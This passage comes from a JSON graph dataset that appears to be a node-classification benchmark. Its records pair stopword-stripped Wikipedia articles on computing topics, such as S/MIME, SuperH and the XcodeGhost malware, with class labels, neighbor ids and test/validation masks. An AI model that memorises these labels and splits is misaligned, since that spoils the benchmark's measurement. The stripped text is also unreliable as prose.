provide common api particularly c clients however moment august 2012 primarily appropriate distributing market-oriented data e.g stock quotes pub-sub middleware message queues allow exchange information distributed applications message queue reside memory disk storage messages stay queue time processed service consumer message queue application implemented independently need know position continue implement procedures remove need waiting receive message",
    "neighbors": [
      10242,
      7045,
      7175,
      9225,
      8718,
      3983,
      9365,
      3990,
      2971,
      8096,
      10913,
      5029,
      3366,
      7461,
      4011,
      7983,
      8751,
      8122,
      1851,
      10686,
      333,
      337,
      8149,
      2011,
      1628,
      8929,
      3558,
      6768,
      4979,
      6522,
      10236
    ],
    "mask": "None"
  },
  {
    "node_id": 1281,
    "label": 5,
    "text": "TDM_Fabric_to_Framer_Interface:tdm fabric framer interface tdm fabric framer interface abbreviated tdm commonly used tdm variants include",
    "neighbors": [
      1261
    ],
    "mask": "Test"
  },
  {
    "node_id": 1282,
    "label": 9,
    "text": "Relevance_Language:relevance language relevance language patented language created bigfix inc. later acquired ibm use bigfix product bigfix software used monitor computers within enterprise take necessary actions bring computer compliance defined policies prominent use determine particular computer whether desktop laptop running windows mac linux mobile device running ios android needs update patch deliver fixlet bigfix term set instructions get update install device bandwidth efficient manner design software company looking language could directly retrieve properties computer cpu disk space etc unable find one appropriate task developed language meet need currently bigfix software uses language",
    "neighbors": [
      8262,
      7306,
      5619,
      823,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 1283,
    "label": 1,
    "text": "Database_(journal):database journal database journal biological databases curation online peer-reviewed open access scientific journal covers research databases biocuration journal established 2009 david landsman editor-in-chief database official journal international society biocuration journal published proceedings international biocuration conferences since 2009 journal abstracted indexed medline/pubmed asian science citation index chemical abstracts",
    "neighbors": [
      2369,
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 1284,
    "label": 5,
    "text": "InterSwitch_Trunk:interswitch trunk interswitch trunk ist one parallel point-to-point links link aggregation connect two switches together create single logical switch ist allows two switches share addressing information forwarding tables state information permitting rapid less one second fault detection forwarding path modification link may different names depending vendor example brocade calls inter-chassis link icl cisco calls vsl virtual switch link edge switches servers pcs see two aggregate switches one large switch allows vendor equipment configured use ieee 802.3ad static link aggregation protocol connect switches take advantage load balancing redundant connections ist protocol developed nortel acquired avaya acquired extreme networks enhance capabilities link aggregation required configured prior configuring smlt dsmlt r-smlt functions two aggregate core distribution access switches edge equipment configured following multi-link trunking mlt dmlt ieee 802.3ad static link aggregation ieee 802.3ad static gigabit etherchannel gec ieee 802.3ad static fast etherchannel fec smlt dsmlt static link aggregation protocols united states patent 7173934 ist supported nortel routing switch 1600 5000 8300 ers 8600 mers 8600 products also avaya virtual services platform vsp 7000 vsp 9000",
    "neighbors": [
      9603,
      7049,
      9937,
      5490,
      11286,
      1303,
      3580,
      10175
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1285,
    "label": 5,
    "text": "Wireless_transaction_protocol:wireless transaction protocol wireless transaction protocol wtp standard used mobile telephony layer wireless application protocol wap intended bring internet access mobile phones wtp provides functions similar tcp except wtp reduced amount information needed transaction e.g include provision rearranging out-of-order packets wtp runs top udp performs many tasks tcp way optimized wireless devices saves processing memory cost compared tcp supports 3 types transaction",
    "neighbors": [
      7396,
      1160,
      11240,
      10924,
      5875,
      9207,
      9367,
      1695
    ],
    "mask": "Test"
  },
  {
    "node_id": 1286,
    "label": 2,
    "text": "Tnftp:tnftp tnftp formerly lukemftp ftp client unix-like operating systems based original bsd ftp client default ftp client included netbsd freebsd openbsd dragonfly bsd darwin midnightbsd maintained luke mewburn notable support server-side tab completion feature ftp client gnu inetutils lacks",
    "neighbors": [
      1801,
      10000,
      274,
      9762,
      8998,
      1071,
      7983,
      11698,
      9151,
      7364,
      9671,
      1993,
      8909,
      1361,
      7249,
      7383,
      4571,
      7907,
      5612,
      2415,
      8816,
      2545,
      11506,
      5492,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 1287,
    "label": 0,
    "text": "North_Side_Inc:north side inc north side montreal-based software company founded 2000 developing natural language understanding natural language generation together dialogue software since 2001 company founded eugene joseph 2000 first company virtual prototypes inc. went public toronto stock exchange july 1999 company currently operates presagis wholly owned subsidiary cae early 2000 north side r work funded part canadian department national defence national research council telefilm canada 2007 north side embarked development bot colony first video game making coherent english dialogue characters integral part gameplay game development financed part canada media fund first two episodes bot colony launched steam june 17 2014 work bot colony started 2007 preliminary work parsing ontologies reasoning started much earlier 2001 peak 2014 team 45 members company spent cumulative 23m project 20m went towards r natural language understanding company launched verbalaccess finovate new york city september 16 2015 verbalaccess provides english interface financial services enabling transactions interactive faq english ability banking transactions completely hands-off enables person bank speech driving walking etc technology also supports transactions via text-messages knowledge base verbalaccess spans financial services encompassing banking credit cards creditworthiness loans savings limited extent insurance investments bot colony north side improved natural language understanding pipeline adding semantic reasoner able reason logical axioms expressed english equivalent prolog predicates english formalized procedural knowledge expressed english key feature distinguishing north side technology intelligent personal assistant based machine learning apple siri google microsoft cortana nuance nina ibm watson ability clarify ambiguous incomplete input handle paraphrases using deterministic rule-based approach north side relies advances parsing disambiguation understand language precisely making financial transactions voice text-messaging feasible underlying database technology supporting north side nlu technology versant object database actian",
    "neighbors": [
      2440,
      3323,
      8421
    ],
    "mask": "Test"
  },
  {
    "node_id": 1288,
    "label": 4,
    "text": "Offline_root_certificate_authority:offline root certificate authority offline root certificate authority certificate authority defined x.509 standard isolated network access often kept powered-down state public key infrastructure chain trusted authorities begins root certificate authority root ca root ca installed root certificate created next action taken administrator root ca issue certificates authorizing intermediate subordinate cas creates ability issue distribute revoke digital certificates without direct action root ca consequences compromised root ca great including need re-issue every certificate pki root cas must kept safe unauthorized access common method ensure security integrity root ca keep offline state brought online needed specific infrequent tasks typically limited issuance re-issuance certificates authorizing intermediate cas drawback offline operation hosting certificate revocation list root ca possible unable respond crl requests via protocols http ldap ocsp however possible move certificate validation functionality dedicated validation authority authorized offline root ca better understand offline root ca greatly improve security integrity pki important realize crl specific ca issued certificates list therefore ca root intermediate responsible tracking revocation certificates alone issued consider scenario root ca issues certificates three intermediate cas b c. newly created intermediate cas issue certificates intermediate ca revoke certificates issue maximum size crl specific intermediate ca would however root ca issued three certificates intermediate cas maximum size crl therefore overall burden maintaining hosting crl specific root ca minimized use intermediate cas well burden maintaining associated validation authority",
    "neighbors": [
      513,
      517,
      1157,
      9744,
      1683,
      1688,
      3742,
      2083,
      8358,
      11693,
      11569,
      9394,
      6651,
      7736,
      4797,
      7231,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      5590,
      474,
      3805,
      7264,
      8674,
      7139,
      10341,
      5107,
      501,
      1526,
      503,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1289,
    "label": 0,
    "text": "Georgetown–IBM_experiment:georgetown–ibm experiment georgetown–ibm experiment influential demonstration machine translation performed january 7 1954 developed jointly georgetown university ibm experiment involved completely automatic translation sixty russian sentences english conceived performed primarily order attract governmental public interest funding showing possibilities machine translation means fully featured system six grammar rules 250 lexical items vocabulary stems endings complete dictionary never fully shown extended one garvin article apart general topics system specialised domain organic chemistry translation carried using ibm 701 mainframe computer launched april 1953 sentences punched onto cards georgetown-ibm experiment best-known result mit conference june 1952 active researchers machine translation field invited conference duncan harkin us department defense suggested department would finance new machine translation project jerome weisner supported idea offered finance research laboratory electronics mit leon dostert invited project previous experience automatic correction translations back 'mechanical translation interpretation system strong impact nuremberg war crimes tribunal linguistics part demonstration carried part linguist paul garvin also good knowledge russian 60 romanized russian statements wide range political legal mathematical scientific topics entered machine computer operator knew russian resulting english translations appeared printer sentences translated carefully selected many operations demonstration fitted specific words sentences addition relational sentence analysis could recognize sentence structure approach mostly 'lexicographical based dictionary specific word connection specific rules steps well publicized journalists perceived success experiment encourage governments invest computational linguistics authors claimed within three five years machine translation could well solved problem however real progress much slower alpac report 1966 found ten years long research failed fulfill expectations funding reduced dramatically demonstration given widespread coverage foreign press small fraction journalists drew attention previous machine translation attempts",
    "neighbors": [
      1890,
      7780,
      10320,
      3323,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 1290,
    "label": 2,
    "text": "IPhone_6S:iphone 6s iphone 6s iphone 6s plus stylized marketed iphone 6s iphone 6s plus smartphones designed developed marketed apple inc ninth generation iphone announced september 9 2015 bill graham civic auditorium san francisco apple ceo tim cook pre-orders beginning september 12 official release september 25 2015 iphone 6s 6s plus succeeded iphone 7 iphone 7 plus september 7 2016 discontinued announcement iphone xs iphone xs max iphone xr september 12 2018 iphone 6s similar design iphone 6 includes updated hardware including strengthened chassis upgraded system-on-chip 12-megapixel camera improved fingerprint recognition sensor lte advanced support hey siri capabilities without needing plugged iphone 6s also introduces new hardware feature known 3d touch enables pressure-sensitive touch inputs iphone 6s mostly positive reception performance camera quality praised reviewers addition 3d touch liked one critic potential entirely new interface interactions disliked another critic providing users expected intuitive response actually using feature battery life criticized one reviewer asserted phone camera significantly better rest industry iphone 6s set new first-weekend sales record selling 13 million models 10 million iphone 6 previous year however apple saw first-ever quarterly year-over-year decline iphone sales months launch credited saturated smartphone market apple biggest countries lack iphone purchases developing countries official unveiling several aspects iphone 6s rumored including base model 16 gigabytes storage pressure-sensitive display technology known 3d touch new rose gold color option iphone 6s iphone 6s plus officially unveiled september 9 2015 press event bill graham civic auditorium san francisco pre-orders began september 12 official release september 25 september 7 2016 apple announced iphone 7 iphone 7 plus successors iphone 6s 6s plus although continued sold reduced price point entry-level options iphone lineup march 31 2017 iphone 6s 6s plus released indonesia alongside iphone 7 7 plus following apple research development investment country iphone 6s iphone 6s plus iphone se last iphone models feature standard 3.5 mm stereo headphone jack discontinued september 12 2018 release iphone xs iphone xs max iphone 6s nearly identical design iphone 6 response bendgate design flaws previous model changes made improve durability chassis 6s constructed stronger 7000 series aluminum alloy key points rear casing strengthened reinforced touchscreen integrated circuits re-located display assembly alongside existing gold silver space gray options new rose gold color option also introduced iphone 6s powered apple a9 system-on-chip company stated 70 faster apple a8 90 better graphics performance iphone 6s 2 gb ram previous iphone also supports lte advanced touch id sensor 6s also updated new version improved fingerprint scanning performance previous version capacities batteries slightly smaller apple rates iphone 6s 6s plus average battery life respective predecessors a9 system-on-chip dual-sourced tsmc samsung although speculated samsung version worse battery performance tsmc version multiple independent tests shown appreciable difference two chips although device promoted iphone 6s degree water resistance change internal design places silicone seal around components logic board adhesive gasket around display assembly prevent shorted accidental exposure water displays sizes iphone 6 coming 4.7-inch 750p 5.5-inch 1080p plus sizes iphone 6s features technology known 3d touch sensors embedded screen backlight layer measure firmness user touch input distance cover glass allowing device distinguish normal forceful presses 3d touch combined taptic engine vibrator provide associated haptic feedback although similar distinct force touch technology used apple watch trackpad retina macbook sensitive recognize levels touch pressure force touch due hardware needed implement 3d touch iphone 6s heavier predecessor iphone 6s features 12-megapixel rear-facing camera upgrade 8-megapixel unit previous models well 5-megapixel front-facing camera record 4k video well 1080p video 30 60 120 frames per second camera well received many critics phone camera takes 4k video recording use storage phone rapidly 16 gigabyte version phone capable holding 40 min 4k video iphone 6s 6s plus originally offered models 16 64 128 gb internal storage following release iphone 7 september 2016 16 64 gb models dropped replaced new 32 gb option improved storage performance iphone 6s utilizes nvm express nvme resulting maximum average read speed 1,840 megabytes per second iphone 6s originally shipped ios 9 operating system leverages 3d touch hardware allow recognition new gestures commands including peeking content light touch popping view pressing harder accessing context menus links commonly used functions within apps harder presses home screen icons camera app retina flash feature allows display brightness used makeshift flash images taken front camera live photos captures short video alongside photo taken iphone 6s supports ios 12 first released september 17 2018 iphone 6s iphone 6s plus also support ios 13 coming soon unveiled june 3 2019 released fully later year supports main features update including new dark mode nilay patel verge 2015 described 6s particular plus model right best phone market ... n't companies roll feature like 3d touch make work way suggests creation entirely new interface paradigms every phone maker needs figure exactly apple cameras consistent really compete samuel gibbs guardian commented phone potential best smaller smartphone market short battery life deeply frustrating described camera leagues ahead competition anymore tom salinger register praised performance noting 're using phones performance current pcs described 3d touch glorified vibrator good ... still n't know quite going happen try ryan smith joshua ho anandtech awarded iphone 6s 6s plus editors choice gold award based largely phone performance addition 3d touch monday following iphone 6s launch weekend apple announced sold 13 million models record-breaking number exceeded 10 million launch sales iphone 6 2014 months following launch apple saw first-ever quarterly year-over-year decline iphone sales attributed saturated smartphone market apple biggest sales countries consumers developing countries buying iphones november 2016 apple announced small number iphone 6s devices manufactured september october 2015 faulty batteries unexpectedly shut apple noted battery problems safety issue announced battery replacement program affected devices customers affected devices span limited serial number range able check device serial number apple website affected receive battery replacement free charge apple stores authorized apple service providers december 2016 apple revealed new details issue stating affected devices contained battery component exposed controlled ambient air longer assembled battery packs statement also said customers outside affected range may also experience unexpected shutdowns though clarifying shutdowns occur normal conditions iphone tries protect electronics provided highly discounted battery replacement customers year apple also said upcoming update ios operating system would include additional diagnostic tools help apple find information different kinds battery issues february 2017 apple released statement techcrunch saying ios 10.2.1 update released january 23 reduced occurrence battery shutdowns 80 iphone 6s devices december 28 2017 apple decreased price out-of-warranty battery replacement iphone 6 later 79 29 one year december 31 2018 promised ios update would provide information iphone battery health eventually turned ios 11.3",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1291,
    "label": 6,
    "text": "Enterprise_Volume_Management_System:enterprise volume management system enterprise volume management system evms flexible integrated volume management software used manage storage systems linux features include evms licensed gnu general public license version 2 later evms supported linux distributions among others 2008 suse debian gentoo lvm evms competing inclusion mainline kernel evms features better userland tools internals lvm attractive kernel developers end lvm battle inclusion response evms team decided concentrate porting evms userland tools work lvm kernelspace sometime release version 2.5.5 february 26 2006 ibm discontinued development project releases 2008 novell announced company would moving evms lvm future editions suse products continuing fully support customers using evms",
    "neighbors": [
      2051,
      3082,
      6669,
      5139,
      10780,
      10785,
      9762,
      6180,
      8242,
      9266,
      6213,
      7244,
      8268,
      10851,
      5222,
      10856,
      4734,
      7812,
      4238,
      10382,
      2193,
      2194,
      2195,
      2197,
      2199,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      3791,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      4438,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044,
      10237
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1292,
    "label": 1,
    "text": "Dependency_theory_(database_theory):dependency theory database theory dependency theory subfield database theory studies implication optimization problems related logical constraints commonly called dependencies databases best known class dependencies functional dependencies form foundation keys database relations another important class dependencies multivalued dependencies key algorithm dependency theory chase much theory devoted study",
    "neighbors": [
      244,
      2901,
      4376,
      4281,
      3004
    ],
    "mask": "None"
  },
  {
    "node_id": 1293,
    "label": 4,
    "text": "Obnam:obnam obnam free open-source backup software 2017 project retired based official site faq page obnam acronym stands obligatory name important features",
    "neighbors": [
      9025,
      6280,
      1358,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1294,
    "label": 1,
    "text": "Simple_Object_Database_Access:simple object database access simple object database access also known s.o.d.a soda api database queries",
    "neighbors": [
      7983,
      5677,
      6797,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1295,
    "label": 8,
    "text": "PDF.js:pdf.js pdf.js pdf.js javascript library renders portable document format pdf files using web standards-compliance html5 canvas project led mozilla foundation andreas gal launched initially experiment 2011 pdf.js work part website browser originally created firefox extension included mozilla firefox since 2012 version 15 enabled default since 2013 version 19 also included owncloud browser extension google chrome chromium firefox android pale moon seamonkey",
    "neighbors": [
      1664,
      3462,
      6791,
      9736,
      7951,
      2836,
      10006,
      11418,
      9757,
      1822,
      5791,
      803,
      1713,
      7861,
      11449,
      5054,
      7543,
      7871,
      9152,
      9281,
      2886,
      10057,
      9418,
      2893,
      2513,
      7889,
      339,
      5078,
      6231,
      10078,
      482,
      10722,
      8169,
      10860,
      3828,
      6133,
      119,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 1296,
    "label": 7,
    "text": "Apache_Giraph:apache giraph apache giraph apache project perform graph processing big data giraph utilizes apache hadoop mapreduce implementation process graphs facebook used giraph performance improvements analyze one trillion edges using 200 machines 4 minutes giraph based paper published google graph processing system called pregel compared big graph processing libraries cassovary",
    "neighbors": [
      10377,
      8460,
      7567,
      6161,
      1047,
      8217,
      1306,
      6555,
      8860,
      11161,
      9631,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 1297,
    "label": 4,
    "text": "S/MIME:s/mime s/mime secure/multipurpose internet mail extensions standard public key encryption signing mime data s/mime ietf standards track defined number documents importantly originally developed rsa data security original specification used ietf mime specification de facto industry standard pkcs 7 secure message format change control s/mime since vested ietf specification layered cryptographic message syntax cms ietf specification identical respects pkcs 7 s/mime functionality built majority modern email software interoperates since built cms mime also hold advanced electronic signature s/mime provides following cryptographic security services electronic messaging applications s/mime specifies mime type codice_1 smime-type enveloped-data data enveloping encrypting whole prepared mime entity enveloped encrypted packed object subsequently inserted application/pkcs7-mime mime entity s/mime used applications one must obtain install individual key/certificate either one in-house certificate authority ca public ca accepted best practice use separate private keys associated certificates signature encryption permits escrow encryption key without compromise non-repudiation property signature key encryption requires destination party certificate store typically automatic upon receiving message party valid signing certificate technically possible send message encrypted using destination party certificate without one certificate digitally sign practice s/mime clients require user install certificate allow encrypting others typical basic class 1 personal certificate verifies owner identity insofar declares sender owner email address sense sender receive email sent address merely proves email received really come address given verify person name business name sender wishes enable email recipients verify sender identity sense received certificate name carries sender name organization name sender needs obtain certificate class 2 ca carries in-depth identity verification process involves making inquiries would-be certificate holder detail authentication see digital signature depending policy ca certificate contents may posted publicly reference verification makes name email address available see possibly search cas post serial numbers revocation status include personal information latter minimum mandatory uphold integrity public key infrastructure message s/mime email client stores encrypted decrypted applicable key pair private key unavailable otherwise unusable e.g. certificate deleted lost private key password forgotten however expired revoked untrusted certificate remain usable cryptographic purposes indexing encrypted messages clear text may possible email clients neither potential dilemmas specific s/mime rather cipher text general apply s/mime messages signed encrypted s/mime signatures usually detached signatures signature information separate text signed mime type multipart/signed second part mime subtype application/ x- pkcs7-signature mailing list software notorious changing textual part message thereby invalidating signature however problem specific s/mime digital signature reveals signed content changed may 13 2018 electronic frontier foundation eff announced critical vulnerabilities s/mime together obsolete form pgp still used many email clients dubbed efail particularly critical hit s/mime require significant coordinated effort many vendors fix personal use non-commercial",
    "neighbors": [
      2050,
      517,
      1030,
      3590,
      8202,
      9744,
      8211,
      6681,
      10271,
      10274,
      3629,
      562,
      1075,
      5179,
      3133,
      1086,
      9281,
      11332,
      8265,
      10831,
      4691,
      3161,
      8283,
      1634,
      10344,
      2154,
      5749,
      2679,
      9860,
      5254,
      4746,
      2187,
      8331,
      653,
      3218,
      11413,
      5270,
      11418,
      2206,
      3742,
      9381,
      10924,
      9909,
      4793,
      7865,
      4797,
      7360,
      7364,
      9451,
      8432,
      6403,
      9987,
      3847,
      9992,
      8468,
      5402,
      5405,
      11046,
      7478,
      5433,
      5437,
      5439,
      2887,
      5469,
      5470,
      5472,
      1893,
      11112,
      10631,
      6544,
      5021,
      929,
      1955,
      7075,
      9642,
      2996,
      3006,
      4543,
      8640,
      2509,
      1496,
      474,
      6110,
      8674,
      7139,
      5118
    ],
    "mask": "None"
  },
  {
    "node_id": 1298,
    "label": 3,
    "text": "SuperH:superh superh sh 32-bit reduced instruction set computing risc instruction set architecture isa developed hitachi currently produced renesas implemented microcontrollers microprocessors embedded systems many original patents superh architecture expiring sh2 cpu reimplemented open source hardware name j2 superh processor core family first developed hitachi early 1990s hitachi developed complete group upward compatible instruction set cpu cores sh-1 sh-2 used sega saturn sega 32x capcom cps-3 cores 16-bit instructions better code density 32-bit instructions great benefit time due high cost main memory years later sh-3 core added sh cpu family new features included another interrupt concept memory management unit mmu modified cache concept sh-3 core also got dsp extension called sh-3-dsp extended data paths efficient dsp processing special accumulators dedicated mac-type dsp engine core unifying dsp risc processor world derivative also used original sh-2 core 1994 1996 35.1 million superh devices shipped worldwide dreamcast hitachi developed sh-4 architecture superscalar 2-way instruction execution vector floating point unit particularly suited 3d graphics highlights architecture sh-4 based standard chips introduced around 1998 sh-3 sh-4 architectures support big-endian little-endian byte ordering bi-endian hitachi stmicroelectronics started collaborating early 1997 design sh-4 early 2001 formed ip company superh inc. going license sh-4 core companies developing sh-5 architecture first move superh 64-bit area 2003 hitachi mitsubishi electric formed joint-venture called renesas technology hitachi controlling 55 2004 renesas technology bought stmicroelectronics share ownership superh inc. licence sh cores renesas technology later became renesas electronics following merger nec electronics sh-5 design supported two modes operation shcompact mode equivalent user-mode instructions sh-4 instruction set shmedia mode different using 32-bit instructions sixty-four 64-bit integer registers simd instructions shmedia mode destination branch jump loaded branch register separately actual branch instruction allows processor prefetch instructions branch without snoop instruction stream combination compact 16-bit instruction encoding powerful 32-bit instruction encoding unique sh-5 arm processors 16-bit thumb mode arm licensed several patents superh thumb mips processors mips-16 mode however sh-5 differs backward compatibility mode 16-bit encoding rather 32-bit encoding evolution superh architecture still continues latest evolutionary step happened around 2003 cores sh-2 sh-4 getting unified superscalar sh-x core forms kind instruction set superset previous architectures today superh cpu cores architecture products renesas electronics merger hitachi mitsubishi semiconductor groups architecture consolidated around sh-2 sh-2a sh-3 sh-4 sh-4a platforms giving scalable family last sh-2 patents expired 2014 linuxcon japan 2015 j-core developers presented cleanroom reimplemention sh-2 isa extensions known j2 core due unexpired trademarks subsequently design walkthrough presented elc 2016 open source bsd licensed vhdl code j2 core proven xilinx fpgas asics manufactured tsmc 180 nm process capable booting µclinux j2 backwards isa compatible sh-2 implemented 5-stage pipeline separate instruction data memory interfaces machine generated instruction decoder supporting densely packed complex relative risc machines isa additional instructions easy add j2 implements instructions dynamic shift using sh-3 later instruction patterns extended atomic operations used threading primitives locking/interfaces symmetric multiprocessor support plans implement sh-2a j2+ sh-4 j4 instruction sets relevant patents expire 2016-2017 several features superh cited motivations designing new cores based architecture family superh cpu cores includes sh-2 32-bit risc architecture 16-bit fixed instruction length high code density features hardware multiply–accumulate mac block dsp algorithms five-stage pipeline sh-2 cache rom-less devices provides 16 general purpose registers vector-base-register global-base-register procedure register today sh-2 family stretches 32 kb on-board flash rom-less devices used variety different devices differing peripherals ethernet motor-control timer unit fast adc others sh-2a upgrade sh-2 core announced early 2006 launch 2007 sh-2a based sh7211 world fastest embedded flash microcontroller running 160 mhz later superseded several newer superh devices running 200 mhz new features sh-2a core include sh-2a family today spans wide memory field 16 kb includes many rom-less variations devices feature standard peripherals ethernet usb well application specific peripherals motor control timers tft controllers peripherals dedicated automotive powertrain applications sh-4 32-bit risc cpu developed primary use multimedia applications sega dreamcast naomi game systems includes much powerful floating point unit additional built-in functions along standard 32-bit integer processing 16-bit instruction size sh-4 features include fpu custom sh4 made casio sh7305 sh-5 64-bit risc cpu almost non-simulated sh-5 hardware ever released unlike still live sh-4 support sh-5 dropped gcc",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      10786,
      6181,
      8231,
      10796,
      3630,
      4144,
      6705,
      7218,
      2623,
      6207,
      2113,
      7234,
      3142,
      8268,
      2638,
      10851,
      3175,
      8815,
      630,
      6268,
      3197,
      7297,
      11405,
      7313,
      10394,
      9371,
      8861,
      6815,
      5793,
      6818,
      6821,
      6311,
      682,
      7852,
      4269,
      9391,
      2224,
      2226,
      3762,
      7858,
      9911,
      11447,
      8890,
      4286,
      8900,
      2761,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      4841,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      249,
      8700,
      8450,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      1820,
      2339,
      6950,
      9003,
      3886,
      7983,
      309,
      8501,
      823,
      5948,
      321,
      8514,
      3911,
      4423,
      7505,
      9044,
      344,
      1376,
      10603,
      8048,
      4465,
      10612,
      1399,
      7033,
      1402,
      3451,
      8576,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      4515,
      3493,
      9126,
      9637,
      1964,
      10669,
      1967,
      2480,
      11184,
      10675,
      1461,
      1462,
      1463,
      4030,
      9151,
      6084,
      453,
      3014,
      6607,
      466,
      2517,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      5103,
      6639,
      499,
      4596,
      2039,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 1299,
    "label": 4,
    "text": "XcodeGhost:xcodeghost xcodeghost variant xcodeghost modified versions apple xcode development environment considered malware software first gained widespread attention september 2015 number apps originating china harbored malicious code thought first large-scale attack apple app store according bbc problems first identified researchers alibaba leading e-commerce firm china 4000 apps infected according fireeye far 25 initially acknowledged apple including apps authors outside china security firm palo alto networks surmised network speeds slower china developers country looked local copies apple xcode development environment encountered altered versions posted domestic web sites opened door malware inserted high profile apps used ios devices even two months initial reports security firm fireeye reported hundreds enterprises still using infected apps xcodeghost remained persistent security risk firm also identified new variant malware dubbed xcodeghost among apps infected popular messaging app wechat netease app music 163 september 16 2015 chinese ios developer mentioned social network sina weibo malware xcode injects third party code apps compiled alibaba researchers published detailed information malware called xcodeghost september 17 2015 palo alto networks published several reports malware slow download speed apple servers chinese ios developers would download xcode third party websites baidu yun called baidu wangpan cloud storage service hosted baidu get copies co-workers attackers took advantage situation distributing compromised versions file hosting websites palo alto networks suspects malware available march 2015 attacker used compiler backdoor attack novelty attack modification xcode compiler however according documents leaked edward snowden cia security researchers sandia national laboratories claimed created modified version apple ’ proprietary software development tool xcode could sneak surveillance backdoors apps programs created using tool known versions xcodeghost add extra files original xcode application xcodeghost also modified linker link malicious files compiled app step reported compiling log xcode ide ios os x apps vulnerable xcodeghost xcodeghost compromised coreservices layer contains highly used features frameworks used app developer compiles application compromised version xcode malicious coreservices automatically integrated app without developer knowledge malicious files add extra code uiwindow class uidevice class uiwindow class object manages coordinates views app displays device screen uidevice class provides singleton instance representing current device instance attacker obtain information device assigned name device model operating-system name version xcodeghost remotely controlled via commands sent attacker command control server http data encrypted using des algorithm ecb mode encryption mode known weak encryption keys also found using reverse engineering attacker could perform man middle attack transmit fake http traffic device open dialog box open specific app example infected app launched either using iphone simulator inside xcode xcodeghost automatically collect device information malware encrypt data send command control server server differs version version xcodeghost palo alto networks able find three server urls last domain also used ios malware keyraider xcodeghost also able time infected app launched store data written ios clipboard malware also able modify data particularly dangerous user uses password management app xcodeghost also able open specific urls infected app launched since apple ios os x work inter-app communication url mechanism e.g 'whatsapp // 'facebook // 'itunes // attacker open apps installed compromised phone computer case infected os x app mechanism could harmful password management apps even phishing websites current known version xcodeghost prompt alert dialogs user device however since requires minor changes using uialertview class uialertviewstyleloginandpasswordinput property infected app display fake alert dialog box looks like normal apple id user credential check send input command control server among chinese apps ims app banking apps mobile carrier app maps stock trading apps sns apps games infected popular apps used world also infected wechat popular instant messaging app camscanner app scan document using smartphone camera winzip pangu team claimed counted 3,418 infected apps fox-it netherland-based security company reports found thousand malicious traffic outside china since article alibaba palo alto networks amazon took servers used xcodeghost baidu also removed malicious xcode installers cloud storage service september 18 2015 apple admitted existence malware began asking developers compromised apps compile apps clean version xcode submitting review pangu team released tool detect infected apps device like antivirus apps wo n't run device n't jailbroken apple allow antivirus apps ios app store apple advises xcode developers verify version xcode always gatekeeper activated machine",
    "neighbors": [
      5858,
      3495,
      6664,
      9063,
      2538,
      107,
      171,
      10221,
      8014,
      10478,
      4883,
      6646,
      11577,
      7515,
      9117,
      4863
    ],
